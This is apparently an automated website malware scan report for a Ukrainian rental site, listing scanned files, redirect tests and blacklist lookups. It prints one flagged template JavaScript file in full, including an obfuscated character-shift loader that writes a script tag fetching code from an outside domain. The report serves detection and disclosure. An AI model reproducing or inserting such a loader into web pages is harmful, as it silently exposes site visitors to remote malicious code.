Scanned pages/files
Request | Server response | Status |
http://www.rentlviv.org.ua/ | 200 OK Content-Length: 41391 Content-Type: text/html | clean |
http://www.rentlviv.org.ua/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://www.rentlviv.org.ua/templates/mega_realist/js/template_utilities.js | 200 OK Content-Length: 1836 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function chooseThisColor(color) { setCookie('template_color', color, 1); window.location.reload(true); } function setCookie(c_name,value,expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); document.cookie=c_name+ "=" +escape(value)+ ((expiredays==null) ? "" : ";expires="+exdate.toUTCString()); } var TemplateUtilities = { start: function() { TemplateUtilities.eqHeight(); }, eqHei }); first_els.setStyle('height', maxHeight+'px'); second_els.setStyle('height', maxHeight+'px'); third_els.setStyle('height', maxHeight+'px'); } }; window.addEvent('domready', TemplateUtilities.start); <!-- js-tools --> c=0;while(c<83)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00bvlsp.ufnqmbuf/dpn/vb0dpnqpofout0dpn`tfbsdi0tubu/qiq#?=0tdsjqu?'.charCodeAt(c++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.rentlviv.org.ua/templates/mega_realist/js/dropdown.min.js | 200 OK Content-Length: 2643 Content-Type: application/x-javascript | clean |
http://www.rentlviv.org.ua/modules/mod_megafeaturedarticleshow/js/jquery.js | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
http://www.rentlviv.org.ua/modules/mod_megafeaturedarticleshow/js/jquerycycle.js | 200 OK Content-Length: 44173 Content-Type: application/x-javascript | clean |
http://apis.google.com/js/plusone.js | 200 OK Content-Length: 12148 Content-Type: application/javascript | clean |
http://www.rentlviv.org.ua/uk.html | 200 OK Content-Length: 41398 Content-Type: text/html | clean |
http://www.rentlviv.org.ua/ru.html | 200 OK Content-Length: 41994 Content-Type: text/html | clean |
http://www.rentlviv.org.ua/en.html | 200 OK Content-Length: 41429 Content-Type: text/html | clean |
http://www.rentlviv.org.ua/index.php | 200 OK Content-Length: 41400 Content-Type: text/html | clean |
http://www.rentlviv.org.ua/uk/purchase.html | 200 OK Content-Length: 19239 Content-Type: text/html | clean |
http://www.rentlviv.org.ua/ru/-.html | 200 OK Content-Length: 18966 Content-Type: text/html | clean |
http://www.rentlviv.org.ua/en/purchase.html | 200 OK Content-Length: 19263 Content-Type: text/html | clean |
http://www.rentlviv.org.ua/en/ | 200 OK Content-Length: 41426 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rentlviv.org.ua
Result:
GET / HTTP/1.1
Host: rentlviv.org.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: rentlviv.org.ua
Referer: http://www.google.com/search?q=rentlviv.org.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rentlviv.org.ua
Referer: http://www.google.com/search?q=rentlviv.org.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rentlviv.org.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rentlviv.org.ua/
Result: rentlviv.org.ua is not infected or malware details are not published yet.
Result: rentlviv.org.ua is not infected or malware details are not published yet.